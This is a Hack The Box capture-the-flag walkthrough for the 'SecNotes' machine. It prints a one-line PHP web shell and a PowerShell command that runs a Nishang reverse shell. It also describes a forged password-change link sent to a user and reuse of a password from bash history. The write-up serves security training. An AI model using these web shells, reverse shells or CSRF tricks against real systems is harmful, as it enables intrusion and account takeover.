Hack The Box – SecNotes Walkthrough
Introduction
This was a very peculiar box, as it involved sending a password change link to a user from a web application in order to reset his password, uploading a PHP shell via SMB to gain remote code execution and therefore a shell, and using a password found in the underlying system’s bash history file to login as the administrator user
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
When running a further Nmap scan using the -p- flag to scan all ports, it also finds port 8808:
Enumerating Port HTTP
When browsing the web server, a login page is displayed
When hitting the “Sign up now” link, it allows to self-register to the website
This page is then displayed after logging in with the newly created user:
The “Contact Us” page allows to send messages to Tyler, the box could be set up to follow links sent to Tyler
Creating a test file and hosting it using the Python Web Server module:
Sending the link to the file to Tyler
The request was received, so this confirms the theory that Tyler will follow any link sent to him
Hacking into Tyler’s account
An “Update Password” page is available
Entering a new password, submitting the form and intercepting the request with Burp Suite – it looks like it sends the new password as an argument but not the old one or a unique user ID, which means if any given user follows this same link it will always change their password.
Sending Tyler a link to change his password to testtest:
Waiting for a minute and then logging in as Tyler
Looks like this worked and it granted access to the web application as Tyler
Exploiting open SMB share and IIS
On the web application, there is a hint about what seems to be an smb share, which includes a password
Logging into the share with smbclient, using the -u flag to specify the user. This seems to point to the root directory of a web server.
When looking at port 8808, the content seems to be the same as the share
Creating a PHP file containing the following code which will allow to remotely execute code:
<?php echo system($_REQUEST["cmd"]);?>
Uploading the file to the SMB share
When sending commands to the cmd parameter, this allows to execute commands remotely, looks like the current user is Tyler.
Copying the Nishang Powershell to the current directory
Adding the Invoke-PowershellTcp function at the end and amending the local IP address/Port:
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
After uploading the Powershell reverse shell via smb, using the PHP shell to execute it:
powershell -ep bypass .\Shell.ps1
A call back is received, granting a reverse shell and remote access to the box
Privilege Escalation
When enumerating for common files and folders, a Ubuntu.zip file is located in the root directory. This might mean that the machine is actually using Windows Subsystem for Linux (WLS) and may actually be running Linux as the underlying operating system.
After a bit of research, the root directory for the underlyign Linux system can be found:
When navigating to the folder of the Linux system, a password embedded in a command can be found in the bash history:
Knowing the administrator user password, PsExec can be used to login:
Conclusion
I quite liked this box as it tries to simulate a real-life scenario, where an attacker sends a maliciously-crafted link to an administrator user in order to gain access to the web application. The privilege escalation phase was quite unique as well, as WSL isn’t very common when doing CTF challenges.